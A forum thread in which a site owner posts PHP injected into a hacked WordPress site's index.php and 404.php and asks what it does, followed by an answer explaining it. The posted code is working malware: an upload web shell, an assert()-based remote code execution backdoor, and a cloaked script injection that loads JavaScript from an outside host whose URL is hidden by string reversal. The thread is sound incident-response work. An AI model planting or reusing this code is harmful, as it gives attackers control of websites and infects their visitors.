My site was hacked and has injected code on index.php and 404.php

Question

Here is the code injected to index.php

if(@isset($_GET[bots])){
    echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">';
    echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
    if($_POST['golden']=="Done"){
        if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){
            echo'+';
        }else{
            echo'-';
        }
    }
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
else exit;

and here is the code injected to 404.php:

@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0);
@ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
    @ini_set('upload_max_filesize','1000000');
    $size=$_POST['size'];
    $open_image=$_FILES['img']['name'];
    $open_image_tmp=$_FILES['img']['tmp_name']; 
    $image_tmp=$size.$open_image;
    @move_uploaded_file($open_image_tmp,$image_tmp);
    echo "<!-- 404-NOT-FOUND-IMG -->";
} else echo "<!-- 404-NOT-FOUND-ERROR -->";
$http_report_user = $_SERVER['HTTP_USER_AGENT'];
if ( @stripos ( $http_report_user, 'bot' ) == false and @stripos ( $http_report_user, 'google' ) == false and @stripos ( $http_report_user, 'yandex' ) == false and @stripos ( $http_report_user, 'slurp' ) == false and @stripos ( $http_report_user, 'yahoo' ) == false and @stripos ( $http_report_user, 'msn' ) == false and @stripos ( $http_report_user, 'bing' ) == false ) {
    $http_report = strtolower ( $_SERVER['HTTP_HOST'] );
    $wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
    $not_found_report = strrev ('=drowyek&');
    $not_found_page=str_ireplace('/','',$_SERVER['REQUEST_URI']);
    $not_found_page=str_ireplace('-',' ',$not_found_page);
    echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';
}?>

Please help me find where it started or the backdoor used to inject such malicious code. Also, can somebody tell me what that code does?

Answer 1

There's a lot of obfuscation there, but these two lines stand out:

$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');

It looks as though they're trying to pull a script in from that site (essays-today). Presumably, that's a compromised domain they've found and exploited, and they're including that code into your site in order to propagate.

echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';

This line is taking the formed string in PHP, and printing it out as HTML. Note how it's doing that: the variables are all being entered into the tags inside <script>, so it's loading that compound string as a location for some Javascript. It's going to then run that external Javascript on your site.

Have you recently installed any new plugins to Wordpress? There are several with known security issues. It might be worth installing a 404 checking plugin. Any requests that your site receives that don't link anywhere will get displayed, so any requests to unsecure plugins will be displayed, along with the location the requests came from. It may not triage the situation, but it will be a good indication as to how and where you're being attacked from.